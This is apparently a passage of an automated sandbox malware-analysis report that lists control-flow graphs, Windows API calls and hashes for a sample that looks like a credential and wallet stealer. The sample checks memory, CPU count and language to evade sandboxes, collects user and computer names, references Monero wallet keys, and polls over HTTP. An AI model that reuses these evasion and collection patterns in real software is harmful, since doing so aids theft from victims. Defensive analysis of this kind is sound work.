                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 62eb190d700e177c4038aa74f315afdc842c3a82fc26a0be133aa517e7979e41
                  • Instruction ID: 7952eefe1e1cea217175d15c50a886bcb92716a64eda3ab1401343b96fe15021
                  • Opcode Fuzzy Hash: 62eb190d700e177c4038aa74f315afdc842c3a82fc26a0be133aa517e7979e41
                  • Instruction Fuzzy Hash: C7715F71A20218ABDB24DFA0CC99FEEB774FB49700F148198F10A6B1D1DBB46A95CF51

                  Control-flow Graph

                  control_flow_graph 1090 2b5510-2b5577 call 2b5ad0 call 2ba820 * 3 call 2ba740 * 4 1106 2b557c-2b5583 1090->1106 1107 2b55d7-2b564c call 2ba740 * 2 call 2a1590 call 2b52c0 call 2ba8a0 call 2ba800 call 2baad0 StrCmpCA 1106->1107 1108 2b5585-2b55b6 call 2ba820 call 2ba7a0 call 2a1590 call 2b51f0 1106->1108 1134 2b5693-2b56a9 call 2baad0 StrCmpCA 1107->1134 1137 2b564e-2b568e call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1107->1137 1124 2b55bb-2b55d2 call 2ba8a0 call 2ba800 1108->1124 1124->1134 1140 2b56af-2b56b6 1134->1140 1141 2b57dc-2b5844 call 2ba8a0 call 2ba820 * 2 call 2a1670 call 2ba800 * 4 call 2b6560 call 2a1550 1134->1141 1137->1134 1142 2b57da-2b585f call 2baad0 StrCmpCA 1140->1142 1143 2b56bc-2b56c3 1140->1143 1272 2b5ac3-2b5ac6 1141->1272 1161 2b5991-2b59f9 call 2ba8a0 call 2ba820 * 2 call 2a1670 call 2ba800 * 4 call 2b6560 call 2a1550 1142->1161 1162 2b5865-2b586c 1142->1162 1146 2b571e-2b5793 call 2ba740 * 2 call 2a1590 call 2b52c0 call 2ba8a0 call 2ba800 call 2baad0 StrCmpCA 1143->1146 1147 2b56c5-2b5719 call 2ba820 call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1143->1147 1146->1142 1250 2b5795-2b57d5 call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1146->1250 1147->1142 1161->1272 1167 2b598f-2b5a14 call 2baad0 StrCmpCA 1162->1167 1168 2b5872-2b5879 1162->1168 1197 2b5a28-2b5a91 call 2ba8a0 call 2ba820 * 2 call 2a1670 call 2ba800 * 4 call 2b6560 call 2a1550 1167->1197 1198 2b5a16-2b5a21 Sleep 1167->1198 1174 2b587b-2b58ce call 2ba820 call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1168->1174 1175 2b58d3-2b5948 call 2ba740 * 2 call 2a1590 call 2b52c0 call 2ba8a0 call 2ba800 call 2baad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 2b594a-2b598a call 2ba7a0 call 2a1590 call 2b51f0 call 2ba8a0 call 2ba800 1175->1276 1197->1272 1198->1106 1250->1142 1276->1167
                  APIs
                    • Part of subcall function 002BA820: lstrlen.KERNEL32(002A4F05,?,?,002A4F05,002C0DDE), ref: 002BA82B
                    • Part of subcall function 002BA820: lstrcpy.KERNEL32(002C0DDE,00000000), ref: 002BA885
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B5644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B56A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B5857
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B5228
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B5318
                    • Part of subcall function 002B52C0: lstrlen.KERNEL32(00000000), ref: 002B532F
                    • Part of subcall function 002B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 002B5364
                    • Part of subcall function 002B52C0: lstrlen.KERNEL32(00000000), ref: 002B5383
                    • Part of subcall function 002B52C0: lstrlen.KERNEL32(00000000), ref: 002B53AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002B5940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B5A0C
                  • Sleep.KERNEL32(0000EA60), ref: 002B5A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 6df79d99c9c3137ce8806482ad3f6366fd385469c491e345cae8c012ab151b99
                  • Instruction ID: 847a57f2fd9ff50b32f00603341a8bba80a4cd1da083cf8c84f5a2e7f089b3b9
                  • Opcode Fuzzy Hash: 6df79d99c9c3137ce8806482ad3f6366fd385469c491e345cae8c012ab151b99
                  • Instruction Fuzzy Hash: 0BE11171930104AACB14FBA0DC97EED7378AF54380F508568B5176A592EF346E39CFA2

                  Control-flow Graph

                  control_flow_graph 1301 2b17a0-2b17cd call 2baad0 StrCmpCA 1304 2b17cf-2b17d1 ExitProcess 1301->1304 1305 2b17d7-2b17f1 call 2baad0 1301->1305 1309 2b17f4-2b17f8 1305->1309 1310 2b17fe-2b1811 1309->1310 1311 2b19c2-2b19cd call 2ba800 1309->1311 1313 2b199e-2b19bd 1310->1313 1314 2b1817-2b181a 1310->1314 1313->1309 1316 2b1849-2b1858 call 2ba820 1314->1316 1317 2b18cf-2b18e0 StrCmpCA 1314->1317 1318 2b198f-2b1999 call 2ba820 1314->1318 1319 2b18ad-2b18be StrCmpCA 1314->1319 1320 2b1821-2b1830 call 2ba820 1314->1320 1321 2b187f-2b1890 StrCmpCA 1314->1321 1322 2b185d-2b186e StrCmpCA 1314->1322 1323 2b1913-2b1924 StrCmpCA 1314->1323 1324 2b1932-2b1943 StrCmpCA 1314->1324 1325 2b18f1-2b1902 StrCmpCA 1314->1325 1326 2b1951-2b1962 StrCmpCA 1314->1326 1327 2b1970-2b1981 StrCmpCA 1314->1327 1328 2b1835-2b1844 call 2ba820 1314->1328 1316->1313 1348 2b18ec 1317->1348 1349 2b18e2-2b18e5 1317->1349 1318->1313 1346 2b18ca 1319->1346 1347 2b18c0-2b18c3 1319->1347 1320->1313 1344 2b189e-2b18a1 1321->1344 1345 2b1892-2b189c 1321->1345 1342 2b187a 1322->1342 1343 2b1870-2b1873 1322->1343 1329 2b1930 1323->1329 1330 2b1926-2b1929 1323->1330 1331 2b194f 1324->1331 1332 2b1945-2b1948 1324->1332 1350 2b190e 1325->1350 1351 2b1904-2b1907 1325->1351 1333 2b196e 1326->1333 1334 2b1964-2b1967 1326->1334 1336 2b198d 1327->1336 1337 2b1983-2b1986 1327->1337 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 2b18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 002B17C5
                  • ExitProcess.KERNEL32 ref: 002B17D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 63767470ee0e7c17d73beb257c7ec66bd5d6dc07a08c249b04b7ead10bc55da1
                  • Instruction ID: dc36b04cf6f803ab2bbc1edaa0a60a8a947e8fb499534a9b1acbda0c86f8983b
                  • Opcode Fuzzy Hash: 63767470ee0e7c17d73beb257c7ec66bd5d6dc07a08c249b04b7ead10bc55da1
                  • Instruction Fuzzy Hash: 7C515AB4A20249EFDB04DFA0D9A4BFE77B5BF44784F508068E506AB241D770E971CB62

                  Control-flow Graph

                  control_flow_graph 1356 2b7500-2b754a GetWindowsDirectoryA 1357 2b754c 1356->1357 1358 2b7553-2b75c7 GetVolumeInformationA call 2b8d00 * 3 1356->1358 1357->1358 1365 2b75d8-2b75df 1358->1365 1366 2b75fc-2b7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 2b75e1-2b75fa call 2b8d00 1365->1367 1369 2b7619-2b7626 call 2ba740 1366->1369 1370 2b7628-2b7658 wsprintfA call 2ba740 1366->1370 1367->1365 1377 2b767e-2b768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 002B7542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002B757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B760A
                  • wsprintfA.USER32 ref: 002B7640
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\$,
                  • API String ID: 1544550907-2700797820
                  • Opcode ID: 22e9369b29198f412002eebcc3741a586a44f49217d44b0d2c7195899afc088f
                  • Instruction ID: e814d0f624e0bcf9dc8193dedc9bd6894e13bcc8eea78958152686f8a6f325c7
                  • Opcode Fuzzy Hash: 22e9369b29198f412002eebcc3741a586a44f49217d44b0d2c7195899afc088f
                  • Instruction Fuzzy Hash: 3541B2B1D14248ABDF10DFA4DC95BEEBBB8EF48740F100099F5096B281DB74AA54CFA5

                  Control-flow Graph

                  APIs
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51770), ref: 002B98A1
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51788), ref: 002B98BA
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D516E0), ref: 002B98D2
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D516B0), ref: 002B98EA
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51698), ref: 002B9903
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D58B78), ref: 002B991B
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D45428), ref: 002B9933
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D45448), ref: 002B994C
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51650), ref: 002B9964
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D517B8), ref: 002B997C
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D51668), ref: 002B9995
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D517D0), ref: 002B99AD
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D45508), ref: 002B99C5
                    • Part of subcall function 002B9860: GetProcAddress.KERNEL32(76210000,00D515C0), ref: 002B99DE
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002A11D0: ExitProcess.KERNEL32 ref: 002A1211
                    • Part of subcall function 002A1160: GetSystemInfo.KERNEL32(?), ref: 002A116A
                    • Part of subcall function 002A1160: ExitProcess.KERNEL32 ref: 002A117E
                    • Part of subcall function 002A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002A112B
                    • Part of subcall function 002A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 002A1132
                    • Part of subcall function 002A1110: ExitProcess.KERNEL32 ref: 002A1143
                    • Part of subcall function 002A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 002A123E
                    • Part of subcall function 002A1220: __aulldiv.LIBCMT ref: 002A1258
                    • Part of subcall function 002A1220: __aulldiv.LIBCMT ref: 002A1266
                    • Part of subcall function 002A1220: ExitProcess.KERNEL32 ref: 002A1294
                    • Part of subcall function 002B6770: GetUserDefaultLangID.KERNEL32 ref: 002B6774
                    • Part of subcall function 002A1190: ExitProcess.KERNEL32 ref: 002A11C6
                    • Part of subcall function 002B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002A11B7), ref: 002B7880
                    • Part of subcall function 002B7850: RtlAllocateHeap.NTDLL(00000000), ref: 002B7887
                    • Part of subcall function 002B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 002B789F
                    • Part of subcall function 002B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7910
                    • Part of subcall function 002B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 002B7917
                    • Part of subcall function 002B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 002B792F
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D58BF8,?,002C110C,?,00000000,?,002C1110,?,00000000,002C0AEF), ref: 002B6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002B6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 002B6AF9
                  • Sleep.KERNEL32(00001770), ref: 002B6B04
                  • CloseHandle.KERNEL32(?,00000000,?,00D58BF8,?,002C110C,?,00000000,?,002C1110,?,00000000,002C0AEF), ref: 002B6B1A
                  • ExitProcess.KERNEL32 ref: 002B6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: ca5bba94120fc99881ee0510bd679a451d3ddd2f43c308841e2c749439a69afb
                  • Instruction ID: 59882fd22ae974936372abef7d93686a460a07ff5a9d27e0901746188ee2e230
                  • Opcode Fuzzy Hash: ca5bba94120fc99881ee0510bd679a451d3ddd2f43c308841e2c749439a69afb
                  • Instruction Fuzzy Hash: CC312B71920208ABDB04FBF0DC97BEE7778AF45380F504528F212A6192DF746935DEA6

                  Control-flow Graph
                  Basic blocks:
                  • 1436: 2a1220-2a1247, call 2b89b0, GlobalMemoryStatusEx
                  • 1439: 2a1249-2a1271, call 2bda00 (x2)
                  • 1440: 2a1273-2a127a
                  • 1442: 2a1281-2a1285
                  • 1444: 2a129a-2a129d
                  • 1445: 2a1287
                  • 1447: 2a1289-2a1290
                  • 1448: 2a1292-2a1294, ExitProcess
                  Edges: 1436->1439, 1436->1440, 1439->1442, 1440->1442, 1442->1444, 1442->1445, 1445->1447, 1445->1448, 1447->1444, 1447->1448
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 002A123E
                  • __aulldiv.LIBCMT ref: 002A1258
                  • __aulldiv.LIBCMT ref: 002A1266
                  • ExitProcess.KERNEL32 ref: 002A1294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: f1e58a667a905c5275cfa06d146bedeaeeebaf04cca6475ca38b24b5ed5a83af
                  • Instruction ID: 48594a053a37589096208a23e50f5127f5a5686939e15033d48f87583dc15cb4
                  • Opcode Fuzzy Hash: f1e58a667a905c5275cfa06d146bedeaeeebaf04cca6475ca38b24b5ed5a83af
                  • Instruction Fuzzy Hash: DC014FB0950308ABEB10DBD0CC49B9DBB78AB04711F248054EA05BA281DA7495618B99

                  Control-flow Graph
                  Basic blocks:
                  • 1450: 2b6af3
                  • 1451: 2b6b0a
                  • 1453: 2b6aba-2b6ad7, call 2baad0, OpenEventA
                  • 1454: 2b6b0c-2b6b22, call 2b6920, call 2b5b10, CloseHandle, ExitProcess
                  • 1459: 2b6ad9-2b6af1, call 2baad0, CreateEventA
                  • 1460: 2b6af5-2b6b04, CloseHandle, Sleep
                  Edges: 1450->1451, 1451->1453, 1451->1454, 1453->1459, 1453->1460, 1459->1454, 1460->1451
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D58BF8,?,002C110C,?,00000000,?,002C1110,?,00000000,002C0AEF), ref: 002B6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002B6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 002B6AF9
                  • Sleep.KERNEL32(00001770), ref: 002B6B04
                  • CloseHandle.KERNEL32(?,00000000,?,00D58BF8,?,002C110C,?,00000000,?,002C1110,?,00000000,002C0AEF), ref: 002B6B1A
                  • ExitProcess.KERNEL32 ref: 002B6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 4ee3e984a72548ad5635c75491201da46179302bc787db60ba8548eaf29057d2
                  • Instruction ID: a2a514d4a7f0b060fc61663e42784e9a9069fee83a8bf6e935c4820cf52e6952
                  • Opcode Fuzzy Hash: 4ee3e984a72548ad5635c75491201da46179302bc787db60ba8548eaf29057d2
                  • Instruction Fuzzy Hash: 52F05E7096021AAFEB00EBA0DC4ABFD7B34FB04785F104925B502B91C2CBF46560DA6A

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
